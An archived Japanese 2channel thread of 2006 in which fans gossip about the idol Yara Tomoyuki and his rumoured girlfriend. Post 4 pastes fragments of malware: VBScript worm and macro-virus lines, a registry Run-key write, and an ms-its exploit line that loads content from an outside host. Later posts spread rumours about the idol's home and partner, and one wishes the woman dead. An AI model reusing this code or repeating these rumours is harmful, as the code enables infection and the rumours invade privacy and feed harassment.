2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■■■屋良っち改め「やらちん」パート20■■【猫】

1 :ユー&名無しネ:2006/10/04(水) 20:02:11 ID:E+olRE7S
無かったので立てました。

↓前スレの立った日03/12/07(日)w
http://tv7.2ch.net/test/read.cgi/jr/1070725731/
http://tv7.2ch.net/jr/kako/1070/10707/1070725731.html

2 :ユー&名無しネ:2006/10/04(水) 21:12:43 ID:Redko6lh
>>1
ありがトン(^^)


3 :ユー&名無しネ:2006/10/04(水) 23:07:28 ID:I47LtfCZ
姐さん乙!

4 :<body onload=window()>:2006/10/04(水) 23:30:03 ID:ipNzC1GS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :ユー&名無しネ:2006/10/05(木) 00:09:25 ID:qunf6EGq
>>1
乙!

ここには張り切りじもってぃーが
来ないことを祈るよ

6 :ユー&名無しネ:2006/10/05(木) 00:42:36 ID:gSqz77lk
>>1
乙(゚д゚)
ぬるぽ

7 :ユー&名無しネ:2006/10/05(木) 12:23:03 ID:ZMpGd9/b
前スレ終わったら移転だったのにまたここに立てたのか
婆は板違いを理解できないのか
デブしてないだろ

8 :ユー&名無しネ:2006/10/05(木) 14:18:35 ID:7Q6QX/hd
舞妓blog復活

9 :ユー&名無しネ:2006/10/05(木) 20:47:12 ID:qunf6EGq
舞妓ブログのコメントとともに
舞妓信者捨てたな

10 :ユー&名無しネ:2006/10/06(金) 00:42:10 ID:LV2kISoG
だね
浮気されてたとかコメントあったけど猫の事?
信者も知ってんだ

11 :ユー&名無しネ:2006/10/06(金) 12:22:17 ID:f7944P5G
>>5 ジモッティー必死でうけるじゃん
舞妓ファンはどうなるのかね

12 :ユー&名無しネ:2006/10/06(金) 12:26:35 ID:Gqp+RKkR
やらちんラブプリ流出中・・
万が一週刊誌載ったとしたら相手は舞妓じゃないね

13 :ユー&名無しネ:2006/10/06(金) 21:44:16 ID:mt5svjme
舞妓じゃなきゃ誰でもいいよ
とりあえず舞台やライブ関連には
連れてくるな

14 :ユー&名無しネ:2006/10/06(金) 22:49:42 ID:m48VDX1E
盛りのついた猫

15 :ユー&名無しネ:2006/10/07(土) 01:50:02 ID:OX0E6rYi
いちおまだファンだけど
なんか最近もうどうでもよくなってきた
そろそろ潮時かな

16 :ユー&名無しネ:2006/10/07(土) 21:14:05 ID:Irn3bzeT
舞台とかはヤラが呼んでるんじゃないよ
まぢ話です!

17 :ユー&名無しネ:2006/10/07(土) 22:58:13 ID:7yD29kel
なんで皆ageなんだよ
同一人物かよ
そりゃ彼氏の舞台なら女は見たいと思うだろが。フォロうぜ

18 :ユー&名無しネ:2006/10/07(土) 23:07:13 ID:7yD29kel
関係者消えろやw

19 :ユー&名無しネ:2006/10/08(日) 09:12:26 ID:UA7zv7qn
『まぢ話です!』とつくだけで信憑性がゼロに聞こえる不思議

20 :ユー&名無しネ:2006/10/08(日) 14:29:02 ID:E3gGNxD7
そして「まぢ」使いがウマシカ女っぽい

21 :ユー&名無しネ:2006/10/08(日) 18:02:02 ID:wH+BhmLT
ラブと飯と昔話

22 :ユー&名無しネ:2006/10/09(月) 13:20:54 ID:vvybFg2E
屋良!とりあえず年下で小さくて胸のある可愛いげのある女と付き合え!

23 :ユー&名無しネ:2006/10/10(火) 15:14:11 ID:GigXrWXp
みんなヤラの女知らない系?ww

24 :ユー&名無しネ:2006/10/10(火) 15:16:27 ID:GigXrWXp
18 お前が消えろやキモばばあ

25 :ユー&名無しネ:2006/10/11(水) 02:56:45 ID:5T6sWiR2
>>23
>>24

ageんなクソガキ!

26 :ユー&名無しネ:2006/10/11(水) 03:42:42 ID:B8XMsBtK
>23
猫の女など知ったこっちゃない。舞妓でなければ誰でもヨイのだ。お幸せに。

27 :ユー&名無しネ:2006/10/11(水) 16:34:38 ID:d4Y9Bcld
>>23のアピール度があの女と同じレベルです。
「本当は私が彼女なのにみんな知らないんだw」とでも言いたいのだろうか。

28 :ユー&名無しネ:2006/10/11(水) 17:21:32 ID:B8XMsBtK
>>27

>>23は放置しときな

29 :ユー&名無しネ:2006/10/12(木) 12:44:16 ID:lnXpzPly
やらっち浅草の近くに住んでるの?

30 :ユー&名無しネ:2006/10/12(木) 14:27:45 ID:/KgM1Wo2
屋良ってそんなに背低いの?

31 :ユー&名無しネ:2006/10/12(木) 18:14:41 ID:367+L6DJ
>>30

今更…

32 :ユー&名無しネ:2006/10/12(木) 21:31:16 ID:h5wUMZp7
822 名前:ユー&名無しネ[sage] 投稿日:2006/10/12(木) 20:39:22 ID:8bAojK/f
やっぱり何かの病気じゃない?
ウタワラの番協にいった子が、羊がでてきて、ヤラのこと話したって言ってたよ
その時、あるメンバーは、こんなことでくじけるの悔しいけど挫折しそう
といっている人もいる。
とか何とか言っていたらしいよ

えぇーっ!?ってオモタが「ヤラ」って「ヤラカシ」か…安心したw

33 :ユー&名無しネ:2006/10/12(木) 23:23:52 ID:duPQShOK


34 :ユー&名無しネ:2006/10/13(金) 00:59:46 ID:ZLXzQ86v
>>32
一瞬コピペ荒らしかとオモタ

35 :ユー&名無しネ:2006/10/13(金) 01:45:19 ID:/GejZYxc
ヤラがヤラカシだとすぐにわからないなんてババアだなw

36 :ユー&名無しネ:2006/10/13(金) 22:07:12 ID:YQTxliFK
餓鬼だなw

37 :ユー&名無しネ:2006/10/15(日) 10:33:16 ID:buJKFHNV
FAMEチケット売れてなくてヤバイんだって?

38 :ユー&名無しネ:2006/10/16(月) 00:03:52 ID:PsHV1Reh
昨日ライブで見てちょっと好きになりました
ほっけ好きなんだね
なんかかわいい

39 :ユー&名無しネ:2006/10/16(月) 22:42:41 ID:4T624WPm
じゃあ>38は猫のファンになってね

40 :ユー&名無しネ:2006/10/19(木) 00:35:44 ID:mCqjGBEi
このスレさびれてるね
屋良くんは人気ないのかな

41 :ユー&名無しネ:2006/10/19(木) 01:01:25 ID:IfU0P50j
ファン減ったからね

42 :サザン:2006/10/19(木) 11:34:26 ID:rF+mrawM
お前らいい加減にしろ。

43 :ユー&名無しネ:2006/10/19(木) 13:17:42 ID:Z0MPFv1A
あーあ…怒らせちゃった

44 :ユー&名無しネ:2006/10/19(木) 23:09:47 ID:qDpU8C2q
おばちゃん怒らせちゃいかんよ〜

45 :ユー&名無しネ:2006/10/20(金) 00:02:26 ID:Yobuv3sk
なんで怒ってんの?
そういえば板違いだよね
だからさびれてるのか…

46 :ユー&名無しネ:2006/10/20(金) 18:33:11 ID:9yKmAIuI
猫がバイトの日サロに来ましたー 愛想いいですよ

47 :ユー&名無しネ:2006/10/21(土) 22:06:01 ID:JkCeIayu
ブラッキー?
SOLE?イリオス?

48 :ユー&名無しネ:2006/10/22(日) 23:01:34 ID:DjzvW6OH
バイトの人来ないかな 情報プリーズ

49 :ユー&名無しネ:2006/10/24(火) 23:18:17 ID:1jnmlsbA
舞妓可愛くなった?w
写りいいだけ??

50 :ユー&名無しネ:2006/10/25(水) 23:41:01 ID:95G5UlWL
>>49
YOU目悪いのか?
ブサ面前回じゃんw

51 :ユー&名無しネ:2006/10/28(土) 14:43:29 ID:sLa8XeOD
50こそが目が悪い 悔しいけど綺麗になったよ舞妓

52 :ユー&名無しネ:2006/10/28(土) 17:46:22 ID:oltP7nU5
舞妓綺麗になったよね。でも目が好きじゃないw
てかじもてぃの話でたらめじゃないんだね。
なんか地元の猫の友達みんなギャルの写メ持ってんだってw
二股?よく分からん。

53 :ユー&名無しネ:2006/10/28(土) 21:40:59 ID:Z6a+1P0D
屋良の地元の弁当屋で前バイトしてて      
たまたま屋良の友達もいたんです。
52さんの言ってるとうり屋良の友達
ギャルの写メ持ってた。みたかんじ
何かのギャル雑誌モデルかなってかんじで
屋良の彼女だよって見せられたから
舞妓だろうなっておもってたら全くの
別人。そいつイワク今わその子と同棲してるとか?
間違いなくその子の実家近くに住んでるみたい
ちなみに私わ山Pが好きだから詳しいことわ
聞いてないけど。 


54 :ユー&名無しネ:2006/10/29(日) 03:33:18 ID:S0BDrCCu
あれでモデルはないだろw
そいつ今お姫様みたいだよねw

55 :ユー&名無しネ:2006/10/29(日) 04:01:56 ID:RWWup/6f
レア物たくさん!無料オークションだよ。
良かったら入ってね!
http://mbok.jp/AFmba193819/

56 :ユー&名無しネ:2006/10/30(月) 11:56:13 ID:/xCTBiX0
なんだか猫をギャルと付き合わせたい自演ちゃんが発生してると聞いてきましたが、ここでつか?

舞妓と猫のしてる指輪を見比べてご覧、真実がわかるから

57 :ユー&名無しネ:2006/10/30(月) 20:30:44 ID:gJviX4FN
舞妓らしき人物を横アリで見たと報告あり 見張れ

58 :ユー&名無しネ:2006/10/30(月) 22:51:42 ID:gNR5LP7J
56事実知らないのお前じゃねー?w

59 :ユー&名無しネ:2006/10/31(火) 20:59:39 ID:BXpcjlXb
知ったか多いな

60 :ユー&名無しネ:2006/11/04(土) 00:33:47 ID:22b4s0K5
屋良宅に女入ってくの見た!

61 :ユー&名無しネ:2006/11/04(土) 01:11:23 ID:Hv1uE6yz
屋良宅ってどこだよ
YOUはヤラカシか

>60はいつものage厨か

62 :ユー&名無しネ:2006/11/04(土) 15:28:51 ID:D6nR2S3T
舞妓光一コンサに30日来て打ち上げの様子書いてるね
むかつく

63 :ユー&名無しネ:2006/11/04(土) 21:15:48 ID:vdaer3Wa
↑違うんじゃない???舞妓が光一コン打ち上げに参加なんて出来るのか???

64 :ユー&名無しネ:2006/11/04(土) 22:30:20 ID:22b4s0K5
うん、残念ながら30日は打ち上げしてないし

65 :p1216-adsau16honb12-acca.tokyo.ocn.ne.jp:2006/11/04(土) 22:56:19 ID:to6q/8nx
猫フライデーされないかなー

66 :ユー&名無しネ:2006/11/05(日) 00:59:53 ID:fbZFucHh
座チョは打ち上げの場であれ現場に「彼女」連れてくるの嫌いみたいだしね

67 :ユー&名無しネ:2006/11/05(日) 14:44:09 ID:FRmaBXRn
知ったか乙ww

68 :ユー&名無しネ:2006/11/06(月) 00:33:11 ID:ku5xLnS0
舞妓ってアジアンのスミタに激似!!!w

69 :ユー&名無しネ:2006/11/06(月) 03:32:33 ID:0WJdMud+
舞妓のblogってどこで見れますか??

70 :ユー&名無しネ:2006/11/07(火) 00:43:26 ID:GQswUNOW
>>69

ググれ

71 :ユー&名無しネ:2006/11/07(火) 19:07:21 ID:vHkbqhBk
誰だよ スミタって w

72 :ユー&名無しネ:2006/11/07(火) 19:09:36 ID:vHkbqhBk
ググって 隅田認識しました
にてねーーーーーーーーーーー お前の方が似てる

73 :ユー&名無しネ:2006/11/07(火) 19:52:16 ID:SqtbQHxW
西川先生に失礼すぎる

74 :ユー&名無しネ:2006/11/07(火) 20:02:42 ID:vHkbqhBk
だってmyco先生だぞ

75 :ユー&名無しネ:2006/11/07(火) 21:04:08 ID:GQswUNOW
隅田の頬加減似てる

根性悪いキャラが西川女史に似てんじゃない?
顔は似てない

76 :ユー&名無しネ:2006/11/10(金) 22:28:52 ID:M5qMItJK
屋良って浜崎好きなの?!

77 :ユー&名無しネ:2006/11/10(金) 23:46:01 ID:fr45PV4j
シラネー

78 :ユー&名無しネ:2006/11/11(土) 11:59:43 ID:1wOEcWOH
舞妓が綺麗になっていくと僻みネタがすごいですね 必死で別れた事にしてるアフォを見てると痛いです

79 :ユー&名無しネ:2006/11/11(土) 14:33:50 ID:sqiwlVj2
どこのなにを見て綺麗になったとか言ってんの?
クセのある顔だとは思うけど綺麗には見えん

80 :ユー&名無しネ:2006/11/11(土) 14:49:08 ID:ENyP0fQX
妬みとはまた違うと思われ

81 :ユー&名無しネ:2006/11/11(土) 15:35:20 ID:sqiwlVj2
舞妓は所謂「女に嫌われる女」の典型的

82 :ユー&名無しネ:2006/11/11(土) 17:14:31 ID:AdMcBMTD
僻みじゃなくてさー綺麗かブスかで言ったら綺麗だけど昔と比べたら衰えてきてない?

83 :ユー&名無しネ:2006/11/12(日) 03:12:37 ID:dijVZdSg
ババアだもんしかたナス

84 :ユー&名無しネ:2006/11/14(火) 00:55:01 ID:d+V+0Fbp
舞妓が猫がいなくて寂しがっていますよ
それともミュージシャンの彼でもできたのかね

85 :ユー&名無しネ:2006/11/14(火) 23:59:38 ID:d+V+0Fbp
舞妓かわえーじゃん

86 :ユー&名無しネ:2006/11/15(水) 13:49:29 ID:d9Jfu5U7
舞妓可愛いっ!!って初めて思っちゃった!!

87 :ユー&名無しネ:2006/11/15(水) 14:01:00 ID:1a/RbW6U
決め顔よりこっちの方がいいね!

88 :ユー&名無しネ:2006/11/15(水) 14:33:49 ID:d9Jfu5U7
舞妓FAMEいつ来るかな?
生で見たいわぁ!

89 :ユー&名無しネ:2006/11/16(木) 00:41:20 ID:EMjLOiRr
オマイらマジでいってんの?ワロス

90 :ユー&名無しネ:2006/11/17(金) 01:26:30 ID:HjCGHH9t
からかいなだけじゃね?
あれが可愛いと思うヤシらを逆に疑うよ。

91 :ユー&名無しネ:2006/11/17(金) 20:16:18 ID:PoG/6Nff

88>>生で見た事あるけど、スタイル超いいから目立つ。猫よりゼツテーーーーイ身長高い。 ブログの写真より、鋭いイメージだね。

92 :ユー&名無しネ:2006/11/17(金) 22:02:12 ID:3SsPFVPB
屋良の彼女超カワイイ!
屋良!自慢しすぎ!回しすぎだから!笑

93 :ユー&名無しネ:2006/11/17(金) 23:25:00 ID:skNx8fhA
舞妓がズニアと付き合うのもファッションの一部分だから

94 :ユー&名無しネ:2006/11/18(土) 19:17:44 ID:LAPOPvG+
ブログ見たいんですけど、どなたか教えていただけませんか?

95 :ユー&名無しネ:2006/11/18(土) 19:59:49 ID:UV0bA6xS
アタシも知りたい!!

96 :ユー&名無しネ:2006/11/18(土) 21:48:43 ID:fRZz4cHL
myco とググレ

97 :ユー&名無しネ:2006/11/19(日) 09:52:13 ID:WvwOn5ot
mycoとググレって何ですか?

98 :ユー&名無しネ:2006/11/19(日) 13:11:04 ID:wvoEm5cv
やらっちって地元稲毛なんですかー?

99 :ユー&名無しネ:2006/11/19(日) 14:52:45 ID:qaAoJopb
>>98 らしいですよ。

100 :ユー&名無しネ:2006/11/19(日) 17:17:17 ID:heADjSpJ
>>98
今は奥さんと都内で同棲です
秋山もほぼ同棲です

101 :ユー&名無しネ:2006/11/19(日) 17:46:00 ID:wvoEm5cv
最近まで稲毛に住んでたんですか?

出身中学・高校わかる人いたら教えてください。

102 :ユー&名無しネ:2006/11/19(日) 19:05:37 ID:tZLvcLb3


103 :ユー&名無しネ:2006/11/19(日) 20:25:10 ID:vRR5JuMr
100ヤラが住んでんの東京だけど都内じゃねーしw

104 :ユー&名無しネ:2006/11/20(月) 02:57:03 ID:829ZjZil
103がアフォ杉w東京が都じゃなかったら何なんだYO!!
オマイの頭の中には「東京県」とか「東京府」とかあんの?wwwwwww
「23区内」じゃないってのなら分かるけどさwwww

105 :ユー&名無しネ:2006/11/20(月) 09:28:54 ID:RtpyyrSg
同棲してる女舞妓じゃないけどねwなんであんなヤシなのか疑問

106 :ユー&名無しネ:2006/11/21(火) 13:43:07 ID:cf3jM0rY
104>文がアホくせぇw
やらはファンと同棲してる
知ってる人は知ってる

107 :ユー&名無しネ:2006/11/21(火) 14:28:36 ID:43xxoOB/
その今カノ&周りの住人のやる事も舞妓と同類(同等)だなぁ。

オメ!

108 :ユー&名無しネ:2006/11/21(火) 16:13:45 ID:/N16+FWZ
舞妓のブログ教えてー

109 :ユー&名無しネ:2006/11/22(水) 13:23:18 ID:BTs3Hxuv
aho!ブログでラブが包まってる服をよく見てみろ!
屋良が最近きてるダウンベストだろが!aho

110 :ユー&名無しネ:2006/11/22(水) 16:23:46 ID:w7q6rJtv
↑は?

111 :ユー&名無しネ:2006/11/22(水) 22:35:22 ID:Jgrs2FYB
109バカ丸出しwww

112 :ユー&名無しネ:2006/11/22(水) 23:48:11 ID:n8bdLWC7
同棲中のファンとは元オリキ?

113 :ユー&名無しネ:2006/11/23(木) 01:58:51 ID:NmZF0jAD
>>92
>>103
>>105
>>106
>>111

2chのルールと申しますか猫スレルールと申しますかお分かりかな?さぁ答えてみよう

114 :ユー&名無しネ:2006/11/23(木) 13:39:31 ID:bzIXWE83
久々来てみたらなんかスゲーね(w

先日の笛夢終演後にマイコお迎え来てたよ


115 :ユー&名無しネ:2006/11/23(木) 21:53:42 ID:It5uhWiY
は?
あれ姉さんだよw

116 :ユー&名無しネ:2006/11/23(木) 22:04:12 ID:NmZF0jAD
舞妓との交際を隠す作戦に出たのか?

117 :ユー&名無しネ:2006/11/23(木) 23:32:12 ID:A734+tkR
113>同一人物だと思ってんのか?w

118 :ユー&名無しネ:2006/11/24(金) 02:30:59 ID:XPlfE5+j
106と117が同一人物なのは明白だなw でも何でここ全角やらハイパーやら
まともにアンカーもうてないアホばかりなんだ…orz

119 :ユー&名無しネ:2006/11/24(金) 20:36:44 ID:QnJsRZlF
106と117が同一人物なのは明白だなw正解!w

120 :ユー&名無しネ:2006/11/25(土) 00:02:51 ID:xNlag8UQ
どうやら舞子じゃないやつと繋げたいようだね
残念ね〜

121 :ユー&名無しネ:2006/11/25(土) 11:54:04 ID:11R8lPzX
↑同棲相手が舞妓だと思いたいらしいが残念ながら違うよ

122 :ユー&名無しネ:2006/11/25(土) 17:21:43 ID:Q8mKdZ6r
いい加減シツコイ!
そういうのも屋良株下げてるんじゃないスカー

123 :ユー&名無しネ:2006/11/25(土) 22:55:42 ID:11R8lPzX
じゃあヤラに聞いてこいよw

124 :ユー&名無しネ:2006/11/25(土) 23:05:45 ID:5WhHhuEX
はい!本日屋良家御一行様がいらっしゃいました
池袋の居酒屋に入り、着いて行ったら席が隣の隣

125 :ユー&名無しネ:2006/11/26(日) 00:17:31 ID:XAjABcmz
>123
猫本人だけどの問題でネーヨ!
そんな簡単で済むなら芸能勤まらないんでないんか。だからカツンや後輩にどんどん抜かされるんでねーかよ。甘ったれた考え持つんじゃね!


126 :ユー&名無しネ:2006/11/26(日) 00:53:55 ID:qAnfD0J0
猫ちんジャニやめてくんないかな…MAがジャニに居続ける意味って何?
踊りでも舞台でも歌でもジャニにすがりつく事ないのに
そら大きい舞台には出れないかもしんないけどさ

127 :ユー&名無しネ:2006/11/26(日) 16:12:29 ID:ooOJV2n+
>125
日本語でおk

128 :ユー&名無しネ:2006/11/26(日) 17:21:00 ID:m3cC90Qj
>126
お前何様?
ファンだって居んだぞ!

129 :ユー&名無しネ:2006/11/27(月) 00:01:21 ID:dd+vtxlk
猫がつけてる指輪は以前から変わってない。同じやつしてる。彼女誰でもドーデモヨイ猫の勝手。

130 :ユー&名無しネ:2006/11/27(月) 17:35:23 ID:e3f2qd8B
今回舞妓来てたの?

131 :ユー&名無しネ:2006/11/27(月) 20:31:31 ID:IUVLjzeS
126同感
MAって結婚できんのか?

132 :ユー&名無しネ:2006/11/28(火) 01:01:58 ID:xbs1letw
その前に>131は結婚できんのか?

133 :ユー&名無しネ:2006/11/28(火) 19:55:10 ID:32A165IN
おばはんに言われたくねーーw

134 :ユー&名無しネ:2006/11/30(木) 13:41:48 ID:9pyKM+Fk
ジャニ辞めて自分達の好き路線を突っ走り始めたらイヤダ
ジャニ的枷が良い意味で働いてると思うし、ジャニパワーがあってこそ出来る経験もあるし

とマジレス

135 :ユー&名無しネ:2006/11/30(木) 14:14:03 ID:U8y29b0k
つか事務所辞めたらどうなるんだ?主演舞台なんてマズ無理でしょ
蛇煮だからやらせてもらってる事イパーイあるよな

136 :ユー&名無しネ:2006/11/30(木) 16:27:18 ID:oBKYf3+B
事務所辞めたらニート決定だな
ヒモになるしかない もう既にヒモ生活かw

137 :ユー&名無しネ:2006/12/01(金) 13:43:24 ID:Tf5fHjJC
屋良のつけてる指輪と舞子の指輪をホムペで見てから色々言えよ どちらも薬指 どこのメーカー?

138 :ユー&名無しネ:2006/12/02(土) 18:29:16 ID:Qo/xFswn
オソロじゃないの?

139 :ユー&名無しネ:2006/12/03(日) 16:43:55 ID:nk9TzGu+
舞妓見たいよー

140 :ユー&名無しネ:2006/12/07(木) 21:38:57 ID:BDSLroxu
舞妓のブログ見てると新たな人に恋してるとアピってない?! 屋良振られたか?

141 :ユー&名無しネ:2006/12/08(金) 18:07:02 ID:LxmxQRBJ
だーかーらー
今は新しい女とつきあってるって前から言ってるやん

142 :ユー&名無しネ:2006/12/08(金) 20:07:50 ID:+xLIBeN3
141>>  お前はわかってない  舞妓に聞いてみろ  アフォ

143 :ユー&名無しネ:2006/12/08(金) 22:18:16 ID:+xLIBeN3
>>138
色違いおソロ

144 :ユー&名無しネ:2006/12/09(土) 04:27:32 ID:D5SQUhBT
>142-143
あんた必死やな(^Д^)9m

145 :ユー&名無しネ:2006/12/09(土) 18:36:59 ID:V7e8BP8y
ほんまに

146 :ユー&名無しネ:2006/12/09(土) 23:15:04 ID:J07VRi8F
上げんな

147 :ユー&名無しネ:2006/12/10(日) 00:03:28 ID:GaJTxqF2
禿げんな

148 :ユー&名無しネ:2006/12/10(日) 03:48:27 ID:qqZF0YFF
誰と付き合ってよーが猫の自由


149 :ユー&名無しネ:2006/12/10(日) 15:04:16 ID:D5uNVnYK
142舞妓の片思いこいつは必死だよ
稲毛じゃ舞妓は笑いものw


150 :ユー&名無しネ:2006/12/10(日) 17:05:54 ID:/I7wSm6q
mycoあげ


151 :ユー&名無しネ:2006/12/11(月) 21:16:29 ID:gFpt3kTB
ブログの舞妓可愛いと思ったらやっぱり別人だったwww

152 :ユー&名無しネ:2006/12/17(日) 00:20:26 ID:q3SIPJ3I
やらっちどこでストリートやってるか知ってる人いますか?
千葉ですかね?

153 :ユー&名無しネ:2006/12/17(日) 01:05:31 ID:HLdqcLv9
舞妓さんて?

154 :ユー&名無しネ:2006/12/17(日) 22:44:58 ID:2mdb+0ZA
152今は東京の下町に住んでるから千葉じゃないと思うよ
どこでやってるかは知らないけど

155 :ユー&名無しネ:2006/12/21(木) 10:14:56 ID:jIWjIl2E
いのししセブン(wオメ!

156 :ユー&名無しネ:2006/12/21(木) 19:08:49 ID:gWQx+wcG
今目の前にいるの舞妓てか?いかにも芸能人ぽい男と二人がいます

157 :ユー&名無しネ:2006/12/21(木) 21:56:19 ID:p3fAmKfC
まだジャニにいたんだ、早く辞めろ!

158 :ユー&名無しネ:2006/12/21(木) 22:33:06 ID:pNdhoho7
芸能人っぽい男って猫?

159 :ユー&名無しネ:2006/12/22(金) 01:07:51 ID:wKKJ84ig
猫は今の時期リハで忙しいだろ?

160 :ユー&名無しネ:2006/12/22(金) 17:01:00 ID:GlEORAU6
忙しくても同棲してるし毎日一緒だね

161 :ユー&名無しネ:2006/12/23(土) 21:34:19 ID:VkhAp9c9
157 ふざけないでください

162 :アミ:2006/12/23(土) 22:09:28 ID:Ltnou1WY
屋良さんカッコいい!もっとテレビに出演して!

163 :ユー&名無しネ:2006/12/23(土) 22:21:41 ID:M0Dd15dx
156ですが、やはり舞妓と吉井怜でした 大口兼悟と永山たかしでした 死ねよ舞妓死んでくれ

164 :ユー&名無しネ:2006/12/23(土) 23:10:04 ID:Dg4X8Clz
検索したら大口がかっこよすぎ!テニプリの人で有名なんだね。
猫とまじ別れたのかな?

165 :ユー&名無しネ:2006/12/23(土) 23:21:46 ID:M0Dd15dx
>>164 猫とはとっくに終わってるだろ 生大口やばいよ ファンになり、テニスの舞台観に行く事にしました w

166 :ユー&名無しネ:2006/12/23(土) 23:26:32 ID:+Cq1kZfg
舞妓遊びまくってるね

167 :ユー&名無しネ:2006/12/23(土) 23:31:35 ID:Vp7hjDt6
舞妓ってめちゃ男友達多いいんしょ
ヤラは他に彼女いるよ 舞妓とは全くジャンル違いのブレンダ系の女

168 :ユー&名無しネ:2006/12/24(日) 20:22:16 ID:qTL+Y56M
舞妓のブログに書いてるダンサーとは猫ですかね

169 :ユー&名無しネ:2006/12/24(日) 23:07:28 ID:rhjYDzRn
ダンサーの仲間って?

170 :ユー&名無しネ:2006/12/26(火) 05:31:58 ID:xgKMOUDe
>165は舞妓と男の趣味がかぶるんだなw

171 :ユー&名無しネ:2006/12/26(火) 20:03:13 ID:KFi4HJyh
ともみと猫ってどんくらい付き合ってた?

172 :ユー&名無しネ:2006/12/27(水) 01:20:26 ID:zI/GKbkX
と●みってパラパラ踊ってた人だっけ?

173 :ユー&名無しネ:2006/12/27(水) 17:31:34 ID:zpcJAhiC
工藤友美ってヒッパレ出たことあるよね
パラパラオールスターズ☆

174 :ユー&名無しネ:2006/12/27(水) 23:14:20 ID:WJjqeADh
猫の髪ガカーリ

175 :ユー&名無しネ:2006/12/28(木) 00:06:54 ID:V3VTtS6r
どんなカンジ?まさか…猫までカリアゲ?

176 :ユー&名無しネ:2006/12/29(金) 02:19:17 ID:mX1DEUku
今日猫を某薬局で見ましたよ〜風邪ひいてるのかな?風邪薬買ってた模様

177 :ユー&名無しネ:2006/12/29(金) 14:30:44 ID:jLhIaN40
>>176

kwsk

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)